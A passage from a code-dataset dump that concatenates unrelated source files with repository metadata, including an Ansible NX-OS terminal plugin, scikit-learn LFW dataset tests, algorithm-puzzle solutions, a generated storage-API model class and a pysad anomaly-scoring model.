# tuple1[4] = "heima"  # would raise TypeError: tuples cannot be modified
for data in tuple1:
    print(data)
"fenglihanxiao@qq.com"
] | fenglihanxiao@qq.com |
9b371d5b80d4dc46d3a0bcdd75543261fb3c344c | 29d09c634ffdd8cab13631d62bc6e3ad00df49bf | /Algorithm/swexpert/1234_비밀번호.py | d93923dd1ba591415e9c6fd6a7dc893fdd765f2b | [] | no_license | kim-taewoo/TIL_PUBLIC | f1d32c3b4f46344c1c99f02e95cc6d2a888a0374 | ae86b542f8b1805b5dd103576d6538e3b1f5b9f4 | refs/heads/master | 2021-09-12T04:22:52.219301 | 2021-08-28T16:14:11 | 2021-08-28T16:14:11 | 237,408,159 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | T = 10
# SW Expert Academy #1234 "password": for each of the T test cases,
# repeatedly delete adjacent equal character pairs (bracket-matching style)
# until no such pair remains, then print the surviving string.
for t in range(1, T+1):
    # input line: "<length> <digit-string>"
    n, s = input().split()
    n = int(n)
    s = list(s)
    while True:
        flag = False  # set when this pass removed at least one pair
        i = 1
        while i < n:
            if s[i-1] == s[i]:
                flag = True
                # drop the adjacent equal pair; i is left unchanged so the
                # characters that just became adjacent are compared next
                s = s[:i-1] + s[i+1:]
                n -= 2
            else:
                i += 1
        if not flag:
            break
    result = "".join(s)
    print("#{} {}".format(t, result))
"acoustic0419@gmail.com"
] | acoustic0419@gmail.com |
3f5f7777bc8920d17095f915f96a0d7b1b008d6b | a1bffcd8854e1843e56bb812d4d83b3161a5211e | /plugins/terminal/nxos.py | f093b70b69edb7d451e1ffb889970913d6c3de30 | [] | no_license | goneri/ansible.community | 1a71f9d98c164b77f8ed2ed7f558b4963005ff8f | f26f612dd0a3154050d90b51a75502018c95f6e4 | refs/heads/master | 2020-12-29T07:47:35.353515 | 2020-01-22T17:43:18 | 2020-01-22T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
from ansible_collections.ansible.community.plugins.module_utils._text import to_bytes, to_text
class TerminalModule(TerminalBase):
    """Terminal plugin for Cisco NX-OS: prompt/error detection and privilege handling."""

    # Byte regexes that match the NX-OS CLI prompt at the end of output
    # (plain exec/enable prompts, and "(config...)#" style config prompts).
    terminal_stdout_re = [
        re.compile(br'[\r\n](?!\s*<)?(\x1b\S+)*[a-zA-Z_0-9]{1}[a-zA-Z0-9-_.]*[>|#](?:\s*)(\x1b\S+)*$'),
        re.compile(br'[\r\n]?[a-zA-Z0-9]{1}[a-zA-Z0-9-_.]*\(.+\)#(?:\s*)$')
    ]

    # Byte regexes that mark command output as an error.
    terminal_stderr_re = [
        re.compile(br"% ?Error"),
        re.compile(br"^error:(.*)", re.I),
        re.compile(br"^% \w+", re.M),
        re.compile(br"% ?Bad secret"),
        re.compile(br"invalid input", re.I),
        re.compile(br"(?:incomplete|ambiguous) command", re.I),
        re.compile(br"connection timed out", re.I),
        re.compile(br"[^\r\n]+ not found", re.I),
        re.compile(br"'[^']' +returned error code: ?\d+"),
        re.compile(br"syntax error"),
        re.compile(br"unknown command"),
        re.compile(br"user not present"),
        re.compile(br"invalid (.+?)at '\^' marker", re.I),
        re.compile(br"configuration not allowed .+ at '\^' marker"),
        re.compile(br"[B|b]aud rate of console should be.* (\d*) to increase [a-z]* level", re.I),
    ]

    def on_become(self, passwd=None):
        """Elevate the session to enable mode, optionally answering a password prompt.

        No-op if the prompt already ends in ``enable#``, if the user is at
        privilege level 15, or if the user has the network-admin role.
        Raises AnsibleConnectionFailure when elevation is not possible.
        """
        if self._get_prompt().endswith(b'enable#'):
            return
        out = self._exec_cli_command('show privilege')
        out = to_text(out, errors='surrogate_then_replace').strip()
        if 'Disabled' in out:
            raise AnsibleConnectionFailure('Feature privilege is not enabled')
        # if already at privilege level 15 return
        if '15' in out:
            return
        if self.validate_user_role():
            return
        # send the enable command as a JSON payload; include the password
        # prompt/answer only when a password was supplied
        cmd = {u'command': u'enable'}
        if passwd:
            cmd[u'prompt'] = to_text(r"(?i)[\r\n]?Password: $", errors='surrogate_or_strict')
            cmd[u'answer'] = passwd
            cmd[u'prompt_retry_check'] = True
        try:
            self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
            prompt = self._get_prompt()
            if prompt is None or not prompt.strip().endswith(b'enable#'):
                raise AnsibleConnectionFailure('failed to elevate privilege to enable mode still at prompt [%s]' % prompt)
        except AnsibleConnectionFailure as e:
            prompt = self._get_prompt()
            raise AnsibleConnectionFailure('unable to elevate privilege to enable mode, at prompt [%s] with error: %s' % (prompt, e.message))

    def on_unbecome(self):
        """Leave enable/config mode, backing out of config mode first if needed."""
        prompt = self._get_prompt()
        if prompt is None:
            # if prompt is None most likely the terminal is hung up at a prompt
            return
        if b'(config' in prompt:
            self._exec_cli_command('end')
            self._exec_cli_command('exit')
        elif prompt.endswith(b'enable#'):
            self._exec_cli_command('exit')

    def on_open_shell(self):
        """Disable output paging and widen the terminal for reliable scraping."""
        try:
            for cmd in ('terminal length 0', 'terminal width 511'):
                self._exec_cli_command(cmd)
        except AnsibleConnectionFailure:
            raise AnsibleConnectionFailure('unable to set terminal parameters')

    def validate_user_role(self):
        """Return True if the remote user has the network-admin role."""
        user = self._connection._play_context.remote_user
        out = self._exec_cli_command('show user-account %s' % user)
        out = to_text(out, errors='surrogate_then_replace').strip()
        match = re.search(r'roles:(.+)$', out, re.M)
        if match:
            roles = match.group(1).split()
            if 'network-admin' in roles:
                return True
        return False
| [
"ansible_migration@example.com"
] | ansible_migration@example.com |
d6c566b32dfe352180d1386f041b191f852b2d05 | ca66a4283c5137f835377c3ed9a37128fcaed037 | /Lib/site-packages/sklearn/datasets/tests/test_lfw.py | ef3e181b7ea130652cd413504429c6cda3597051 | [] | no_license | NamithaKonda09/majorProject | f377f7a77d40939a659a3e59f5f1b771d88889ad | 4eff4ff18fa828c6278b00244ff2e66522e0cd51 | refs/heads/master | 2023-06-04T20:25:38.450271 | 2021-06-24T19:03:46 | 2021-06-24T19:03:46 | 370,240,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,768 | py | """This test for the LFW require medium-size data downloading and processing
If the data has not been already downloaded by running the examples,
the tests won't run (skipped).
If the test are run, the first execution will be long (typically a bit
more than a couple of minutes) but as the dataset loader is leveraging
joblib, successive runs will be fast (less than 200ms).
"""
import random
import os
import shutil
import tempfile
import numpy as np
from functools import partial
from sklearn.externals import six
from sklearn.externals._pilutil import pillow_installed, imsave
from sklearn.datasets import fetch_lfw_pairs
from sklearn.datasets import fetch_lfw_people
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import assert_raises
from sklearn.datasets.tests.test_common import check_return_X_y
SCIKIT_LEARN_DATA = tempfile.mkdtemp(prefix="scikit_learn_lfw_test_")
SCIKIT_LEARN_EMPTY_DATA = tempfile.mkdtemp(prefix="scikit_learn_empty_test_")
LFW_HOME = os.path.join(SCIKIT_LEARN_DATA, 'lfw_home')
FAKE_NAMES = [
'Abdelatif_Smith',
'Abhati_Kepler',
'Camara_Alvaro',
'Chen_Dupont',
'John_Lee',
'Lin_Bauman',
'Onur_Lopez',
]
def setup_module():
    """Test fixture run once and common to all tests of this module.

    Builds a fake LFW dataset under LFW_HOME: random face images for each
    fake person, a pollution file the loader must ignore, and pairing
    metadata files in the LFW text format.
    """
    if not pillow_installed:
        raise SkipTest("PIL not installed.")
    if not os.path.exists(LFW_HOME):
        os.makedirs(LFW_HOME)
    # fixed seeds keep the generated dataset (and test expectations) reproducible
    random_state = random.Random(42)
    np_rng = np.random.RandomState(42)
    # generate some random jpeg files for each person
    counts = {}
    for name in FAKE_NAMES:
        folder_name = os.path.join(LFW_HOME, 'lfw_funneled', name)
        if not os.path.exists(folder_name):
            os.makedirs(folder_name)
        # each fake person gets 1-4 images of 250x250 RGB noise
        n_faces = np_rng.randint(1, 5)
        counts[name] = n_faces
        for i in range(n_faces):
            file_path = os.path.join(folder_name, name + '_%04d.jpg' % i)
            uniface = np_rng.randint(0, 255, size=(250, 250, 3))
            try:
                imsave(file_path, uniface)
            except ImportError:
                raise SkipTest("PIL not installed")
    # add some random file pollution to test robustness
    with open(os.path.join(LFW_HOME, 'lfw_funneled', '.test.swp'), 'wb') as f:
        f.write(six.b('Text file to be ignored by the dataset loader.'))
    # generate some pairing metadata files using the same format as LFW
    with open(os.path.join(LFW_HOME, 'pairsDevTrain.txt'), 'wb') as f:
        f.write(six.b("10\n"))
        # five "same person" pairs need people with at least two images
        more_than_two = [name for name, count in six.iteritems(counts)
                         if count >= 2]
        for i in range(5):
            name = random_state.choice(more_than_two)
            first, second = random_state.sample(range(counts[name]), 2)
            f.write(six.b('%s\t%d\t%d\n' % (name, first, second)))
        # five "different persons" pairs
        for i in range(5):
            first_name, second_name = random_state.sample(FAKE_NAMES, 2)
            first_index = random_state.choice(np.arange(counts[first_name]))
            second_index = random_state.choice(np.arange(counts[second_name]))
            f.write(six.b('%s\t%d\t%s\t%d\n' % (first_name, first_index,
                                                second_name, second_index)))
    with open(os.path.join(LFW_HOME, 'pairsDevTest.txt'), 'wb') as f:
        f.write(six.b("Fake place holder that won't be tested"))
    with open(os.path.join(LFW_HOME, 'pairs.txt'), 'wb') as f:
        f.write(six.b("Fake place holder that won't be tested"))
def teardown_module():
    """Test fixture (clean up) run once after all tests of this module"""
    for tmp_dir in (SCIKIT_LEARN_DATA, SCIKIT_LEARN_EMPTY_DATA):
        if os.path.isdir(tmp_dir):
            shutil.rmtree(tmp_dir)
def test_load_empty_lfw_people():
    # Without download permission, an empty data home must raise IOError.
    assert_raises(IOError, fetch_lfw_people,
                  download_if_missing=False,
                  data_home=SCIKIT_LEARN_EMPTY_DATA)
def test_load_fake_lfw_people():
    """Check shapes/targets for the default (resized, gray) and raw (color) loads."""
    lfw_people = fetch_lfw_people(data_home=SCIKIT_LEARN_DATA,
                                  min_faces_per_person=3,
                                  download_if_missing=False)
    # The data is cropped around the center as a rectangular bounding box
    # around the face. Colors are converted to gray levels:
    assert_equal(lfw_people.images.shape, (10, 62, 47))
    assert_equal(lfw_people.data.shape, (10, 2914))
    # the target is an array of person integer ids
    assert_array_equal(lfw_people.target, [2, 0, 1, 0, 2, 0, 2, 1, 1, 2])
    # names of the persons can be found using the target_names array
    expected_classes = ['Abdelatif Smith', 'Abhati Kepler', 'Onur Lopez']
    assert_array_equal(lfw_people.target_names, expected_classes)
    # It is possible to ask for the original data without any cropping or color
    # conversion and no limit on the number of pictures per person
    lfw_people = fetch_lfw_people(data_home=SCIKIT_LEARN_DATA, resize=None,
                                  slice_=None, color=True,
                                  download_if_missing=False)
    assert_equal(lfw_people.images.shape, (17, 250, 250, 3))
    # the ids and class names are the same as previously
    assert_array_equal(lfw_people.target,
                       [0, 0, 1, 6, 5, 6, 3, 6, 0, 3, 6, 1, 2, 4, 5, 1, 2])
    assert_array_equal(lfw_people.target_names,
                       ['Abdelatif Smith', 'Abhati Kepler', 'Camara Alvaro',
                        'Chen Dupont', 'John Lee', 'Lin Bauman', 'Onur Lopez'])
    # test return_X_y option
    fetch_func = partial(fetch_lfw_people, data_home=SCIKIT_LEARN_DATA,
                         resize=None,
                         slice_=None, color=True,
                         download_if_missing=False)
    check_return_X_y(lfw_people, fetch_func)
def test_load_fake_lfw_people_too_restrictive():
    # No fake person has 100 images, so the filter leaves nothing to load.
    assert_raises(ValueError, fetch_lfw_people,
                  download_if_missing=False,
                  data_home=SCIKIT_LEARN_DATA,
                  min_faces_per_person=100)
def test_load_empty_lfw_pairs():
    # Without download permission, an empty data home must raise IOError.
    assert_raises(IOError, fetch_lfw_pairs,
                  download_if_missing=False,
                  data_home=SCIKIT_LEARN_EMPTY_DATA)
def test_load_fake_lfw_pairs():
    """Check pair shapes/targets for the default (gray) and raw (color) loads."""
    lfw_pairs_train = fetch_lfw_pairs(data_home=SCIKIT_LEARN_DATA,
                                      download_if_missing=False)
    # The data is cropped around the center as a rectangular bounding box
    # around the face. Colors are converted to gray levels:
    assert_equal(lfw_pairs_train.pairs.shape, (10, 2, 62, 47))
    # the target is whether the person is the same or not
    assert_array_equal(lfw_pairs_train.target, [1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
    # names of the persons can be found using the target_names array
    expected_classes = ['Different persons', 'Same person']
    assert_array_equal(lfw_pairs_train.target_names, expected_classes)
    # It is possible to ask for the original data without any cropping or color
    # conversion
    lfw_pairs_train = fetch_lfw_pairs(data_home=SCIKIT_LEARN_DATA, resize=None,
                                      slice_=None, color=True,
                                      download_if_missing=False)
    assert_equal(lfw_pairs_train.pairs.shape, (10, 2, 250, 250, 3))
    # the ids and class names are the same as previously
    assert_array_equal(lfw_pairs_train.target, [1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
    assert_array_equal(lfw_pairs_train.target_names, expected_classes)
| [
"namithakonda09@gmail.com"
] | namithakonda09@gmail.com |
604599cedc334aac2215f97356a0b6f4335a8b7e | effce116340b7d937bd285e43b49e1ef83d56156 | /data_files/077 Word Search.py | df667d96008f38fbe8068603ea7dac53fef15da9 | [] | no_license | DL2021Spring/CourseProject | a7c7ef57d69bc1b21e3303e737abb27bee3bd585 | 108cdd906e705e9d4d05640af32d34bfc8b124da | refs/heads/master | 2023-04-11T18:52:30.562103 | 2021-05-18T09:59:59 | 2021-05-18T09:59:59 | 365,733,976 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py |
__author__ = 'Danyang'
class Solution:
def exist(self, board, word):
if not board:
return
m = len(board)
n = len(board[0])
visited = [[False for _ in xrange(n)] for _ in xrange(m)]
for i in xrange(m):
for j in xrange(n):
if board[i][j]==word[0]:
visited[i][j] = True
if self.search(board, i, j, word[1:], visited):
return True
visited[i][j] = False
return False
def search(self, board, pre_row, pre_col, word, visited):
if not word:
return True
m = len(board)
n = len(board[0])
next_positions = [(pre_row-1, pre_col), (pre_row+1, pre_col), (pre_row, pre_col-1), (pre_row, pre_col+1)]
for next_position in next_positions:
if 0<=next_position[0]<m and 0<=next_position[1]<n:
if visited[next_position[0]][next_position[1]]==False and board[next_position[0]][next_position[1]]==word[0]:
visited[next_position[0]][next_position[1]] = True
if self.search(board, next_position[0], next_position[1], word[1:], visited):
return True
visited[next_position[0]][next_position[1]] = False
return False
if __name__=="__main__":
board = [
"ABCE",
"SFCS",
"ADEE"
]
word = "ABCCED"
print Solution().exist(board, word) | [
"1042448815@qq.com"
] | 1042448815@qq.com |
c800922df670b98c575e1b37bf3ed5a8a111b60b | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/remote_protection_group_response.py | 7dc6d86902296b0ff666f551e0f931da5d595eaf | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,024 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class RemoteProtectionGroupResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[RemoteProtectionGroup]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.RemoteProtectionGroup]
):
"""
Keyword args:
items (list[RemoteProtectionGroup]): Returns a list of all items after filtering. The values are displayed for each name where meaningful.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RemoteProtectionGroupResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RemoteProtectionGroupResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"noreply@github.com"
] | PureStorage-OpenConnect.noreply@github.com |
34bdda6befcd530668ce884b66c6f71627ad7812 | 06b1e6b254d0be9f42f4832f94f5ba225ea54b80 | /tests/test_commands/test_deps_tree.py | b9d8355d47a3cf352de388aef766d3d2b9ee8f14 | [
"MIT"
] | permissive | b0g3r/dephell | 9481b7023b65d94bea5825e9784907c6f57f6d79 | 40f3451bf5958284af021fbd5486ad71c03efc25 | refs/heads/master | 2020-06-13T16:24:41.404188 | 2019-06-26T17:16:15 | 2019-06-26T17:16:15 | 194,709,388 | 0 | 0 | null | 2019-07-01T16:38:57 | 2019-07-01T16:38:56 | null | UTF-8 | Python | false | false | 763 | py | # built-in
import json
from pathlib import Path
# project
import pytest
from dephell.commands import DepsTreeCommand
from dephell.config import Config
@pytest.mark.allow_hosts()
def test_deps_tree_command(temp_path: Path, capsys):
    """`deps tree --type=json` prints the autopep8 dependency tree as JSON."""
    cfg = Config()
    cfg.attach({
        'level': 'WARNING',
        'silent': True,
    })
    cmd = DepsTreeCommand(argv=['--type=json', 'autopep8==1.4.3'], config=cfg)
    ok = cmd()
    printed = capsys.readouterr().out
    tree = json.loads(printed)
    assert ok is True
    assert len(tree) == 2
    assert tree[0]['name'] == 'autopep8'
    assert tree[0]['dependencies'] == ['pycodestyle']
    assert tree[1]['name'] == 'pycodestyle'
    assert tree[1]['dependencies'] == []
| [
"master_fess@mail.ru"
] | master_fess@mail.ru |
97e53264bee22412d3530524e5d9112807c0a671 | ca299cec2cd84d8b7c2571fa2fdf7161e66b8fe7 | /private_server/guard/CELL-34/Q-33/34-33.py | 259448e0006f40ecbc27700fd825b133d9cb27bf | [] | no_license | benmechen/CodeSet | ca57d4a065ac4fc737749f65cb5aa1011d446a88 | f5a4bf627a9a8efc76a65ae58db63a973fedffb7 | refs/heads/master | 2021-07-16T14:23:36.355491 | 2019-12-02T13:58:27 | 2019-12-02T13:58:27 | 225,385,245 | 1 | 0 | null | 2021-06-22T15:37:57 | 2019-12-02T13:47:09 | JavaScript | UTF-8 | Python | false | false | 148 | py | from datetime import datetime
# Capture the current timestamp once, then break out its date fields.
now = datetime.now()
year, month, day = now.year, now.month, now.day
# Print the full timestamp followed by each component, one per line.
for value in (now, year, month, day):
    print(value)
"psybm7@nottingham.ac.uk"
] | psybm7@nottingham.ac.uk |
108dfa96dc0b6497ddfb5addccc22f6f7974880a | 138f2550bb088a0597e1e71124d9ae32b1fe59c9 | /xbrr/edinet/models/documents.py | 8b15506df1c609b1ab2e24c2fd4dc3f37fbd524f | [
"MIT"
] | permissive | chakki-works/xbrr | 9009539e1821c3d9c815f694eb52158ccbbeeb78 | a9783acbb6c23eb0be0e1fbfb47e5b0b0e2cbfb8 | refs/heads/master | 2022-07-22T22:30:17.054418 | 2021-06-16T13:27:40 | 2021-06-16T13:27:40 | 182,622,738 | 23 | 5 | MIT | 2022-07-15T18:42:36 | 2019-04-22T04:26:21 | Python | UTF-8 | Python | false | false | 999 | py | from xbrr.edinet.models.metadata import MetaData
from xbrr.edinet.models.document import Document
class Documents():
    """Document lists"""
    def __init__(self, metadata: MetaData = None, documents: list = ()):
        """
        Keyword Arguments:
            metadata {MetaData} -- Metadata (default: {None}).
            documents {list} -- Document list (default: {()}).
        """
        self.metadata = metadata
        # name-mangled to discourage direct mutation; read access is
        # provided through the `list` property below
        self.__documents = documents
    @property
    def list(self):
        """Read-only access to the wrapped document list."""
        return self.__documents
    @classmethod
    def create(cls, body: dict) -> "Documents":
        """Create instance from EDINET response.
        Arguments:
            body {dict} -- EDINET response (expected to contain a "results" list).
        Returns:
            Documents -- Documents and its metadata.
        """
        metadata = MetaData.create(body)
        _documents = body["results"]
        documents = [Document.create(d) for d in _documents]
        instance = cls(metadata, documents)
        return instance
| [
"icoxfog417@yahoo.co.jp"
] | icoxfog417@yahoo.co.jp |
406a7ce5aac74ea320d07ca700ccb30e3dee2c7f | 8ae28de60c84c4f36d29289bad14cf8bbb4be1ba | /bot/units/models/terran/cyclone.py | b9eef5eb284ad781ced60ff5809439fd0b96b40d | [
"MIT"
] | permissive | ljuti/raynors-rangers | 05d0be6e5dcb9e480f6a75bf0b7fe216f05da8d1 | 1f9f3a39aa62c8956987e322d690318c7b67e283 | refs/heads/master | 2023-04-30T23:06:26.893739 | 2019-05-19T20:21:49 | 2019-05-19T20:22:08 | 169,393,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | class CycloneModel():
    def __init__(self):
        # Static unit stats for the Terran Cyclone (supply cost, transport
        # cargo size, hit points, attack range, vision, movement speed).
        self.supply = 3
        self.cargo_size = 3
        self.health = 180
        self.range = 4
        self.range_upgraded = 6  # presumably range after an upgrade -- TODO confirm which
        self.sight = 11
        self.speed = 4.13
        # can shoot both ground and air targets
        self.ground_attack = True
        self.aerial_attack = True
"ruby@laurijutila.com"
] | ruby@laurijutila.com |
5799c479daf151abfecc6cf23b20949168fe1702 | 7dbb60661d3d8b8e0ded9d3febd21032e5c281d5 | /Pycon2009/excell/xlrd/open.py | c338f5150dc90a9ed67d5717dfc0ca0cd8a1fb0a | [] | no_license | cabecada/pydanny-event-notes | dc8175196e936a8c97b9009281c184beecd28778 | cda2a32cafe96701f4e728d4802ef3f3d9d5e9a0 | refs/heads/master | 2021-01-24T04:54:14.991218 | 2018-01-24T23:45:37 | 2018-01-24T23:45:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | from mmap import mmap,ACCESS_READ
from xlrd import open_workbook
# Demo (Python 2): three ways to hand a workbook to xlrd.
# 1. Let xlrd open the file from a path.
print open_workbook('simple.xls')
# 2. Pass a memory-mapped view of the file as file_contents.
with open('simple.xls', 'rb') as f:
    print open_workbook(
        file_contents=mmap(f.fileno(),0,access=ACCESS_READ)
    )
# 3. Pass the raw bytes read into memory as file_contents.
aString = open('simple.xls','rb').read()
print open_workbook(file_contents=aString)
| [
"pydanny@gmail.com"
] | pydanny@gmail.com |
d5bcf06456df9f6bf43807cb045a5cb3a0d9f605 | 94f1711fc8b25f3c027ee64a1c44e7a7c9be9972 | /examples/plot.py | 0df8728bfdbe26d21fe46b36dc700454caa2dd9e | [] | no_license | ALBA-Synchrotron/sls-detector | b5211a98800c2d271569b775bc1e48224ee89313 | 961d33152af298eb4cbd311d9d185683ba992199 | refs/heads/master | 2023-07-01T14:26:11.152686 | 2021-07-30T10:06:14 | 2021-07-30T10:06:14 | 262,325,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | import argparse
import threading
import pyqtgraph
from pyqtgraph.Qt import QtGui, QtCore
import sls.client
class QDetector(QtCore.QObject):
    # QObject wrapper exposing a Qt signal that carries one acquired frame
    # per emission (payload is an arbitrary Python object).
    newFrame = QtCore.Signal(object)
def run(options):
    """Open a pyqtgraph window and live-plot frames acquired from the detector.

    `options` carries `host`, `nb_frames` and `exposure_time` (see main()).
    Blocks in the Qt event loop until the window is closed.
    """
    app = QtGui.QApplication([])
    plot = pyqtgraph.plot()
    curve = plot.plot()
    plot.show()
    # configure the detector from the CLI options
    mythen = sls.client.Detector(options.host)
    mythen.nb_frames = options.nb_frames
    mythen.exposure_time = options.exposure_time
    qmythen = QDetector()
    def acquire(curve):
        # worker thread: frames are forwarded through the Qt signal,
        # presumably so curve updates happen via the Qt connection rather
        # than direct calls from this thread -- NOTE(review): the `curve`
        # parameter is unused here.
        for frame in mythen.acquire():
            qmythen.newFrame.emit(frame)
    qmythen.newFrame.connect(curve.setData)
    # daemon thread so a closed window doesn't hang on a running acquisition
    th = threading.Thread(target=acquire, args=(curve,), daemon=True)
    th.start()
    app.exec_()
def main(args=None):
    """Parse command-line options and launch the live plot."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--nb-frames', type=int, default=10)
    parser.add_argument('--exposure-time', type=float, default=0.1)
    parser.add_argument('--host', default='localhost')
    run(parser.parse_args(args))
if __name__ == '__main__':
    main()
| [
"coutinhotiago@gmail.com"
] | coutinhotiago@gmail.com |
157381b94215aba0360d4819a7269f9adf6b9595 | 1025bc2aa5aaa40970ad1a51d8d0b1202a1ea11e | /Utilities/python/rootbindings.py | 675032fc480bd291fe0ad8c11edb5d6bdaab6d34 | [] | no_license | uwcms/FinalStateAnalysis | f2be318546728621676a4b90ed2678b2560c94e6 | bcb164a8e27d459a9ac438780f6c8730d3e856bf | refs/heads/miniAOD_9_4_0 | 2022-11-09T01:28:52.199025 | 2019-03-15T19:25:10 | 2019-03-15T19:25:10 | 5,201,989 | 5 | 32 | null | 2020-11-19T17:02:32 | 2012-07-27T07:51:18 | Python | UTF-8 | Python | false | false | 259 | py | import ROOT
# Load the compiled FinalStateAnalysis utilities into the ROOT interpreter.
# The commented Load() calls are optional libraries kept for reference.
## ROOT.gSystem.Load("libFinalStateAnalysisStatTools")
## ROOT.gSystem.Load('libFinalStateAnalysisTagAndProbe')
ROOT.gSystem.Load('libFinalStateAnalysisUtilities')
#ROOT.gSystem.Load('$CMSSW_BASE/lib/$SCRAM_ARCH/libHiggsAnalysisCombinedLimit.so')
| [
"Silvia.Taroni@cern.ch"
] | Silvia.Taroni@cern.ch |
6b5df35f09ed114b1f7f501d8fe3b0dc271e5838 | 03778e9985613ffccd8e2076ed51e86e86f997b6 | /pysad/models/standard_absolute_deviation.py | 169b9170f9ec8f4192f841274f51c846c746ec8d | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | isci1102/pysad | e3fe263a075fc51ee2bce548da458222ec5a3b7a | dff2ff38258eb8a85c9d34cf5f0b876fc1dc9ede | refs/heads/master | 2023-03-18T03:33:19.345541 | 2020-09-08T01:32:29 | 2020-09-08T01:32:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,185 | py | from pysad.core.base_model import BaseModel
from pysad.statistics.average_meter import AverageMeter
from pysad.statistics.median_meter import MedianMeter
from pysad.statistics.variance_meter import VarianceMeter
class StandardAbsoluteDeviation(BaseModel):
    """The model that assigns the deviation from the mean (or median) and divides with the standard deviation. This model is based on the 3-Sigma rule described in :cite:`hochenbaum2017automatic`.

    Args:
        substracted_statistic (str): The statistic to be substracted for scoring. It is either "mean" or "median". (Default="mean").
        absolute (bool): Whether to output score's absolute value. (Default=True).
    """
    def __init__(self, substracted_statistic="mean", absolute=True):
        self.absolute = absolute
        # running variance of all observed values (for the denominator)
        self.variance_meter = VarianceMeter()
        # running center statistic (for the numerator)
        if substracted_statistic == "median":
            self.sub_meter = MedianMeter()
        elif substracted_statistic == "mean":
            self.sub_meter = AverageMeter()
        else:
            raise ValueError(
                "Unknown substracted_statistic value! Please choose median or mean.")
    def fit_partial(self, X, y=None):
        """Fits the model to next instance.
        Args:
            X (np.float array of shape (1,)): The instance to fit. Note that this model is univariate.
            y (int): Ignored since the model is unsupervised (Default=None).
        Returns:
            object: Returns the self.
        """
        assert len(X) == 1  # Only for time series
        self.variance_meter.update(X)
        self.sub_meter.update(X)
        return self
    def score_partial(self, X):
        """Scores the anomalousness of the next instance.
        Args:
            X (np.float array of shape (1,)): The instance to score. Higher scores represent more anomalous instances whereas lower scores correspond to more normal instances.
        Returns:
            float: The anomalousness score of the input instance.
        """
        sub = self.sub_meter.get()
        dev = self.variance_meter.get()**0.5
        # epsilon guards against division by zero when the running variance is 0
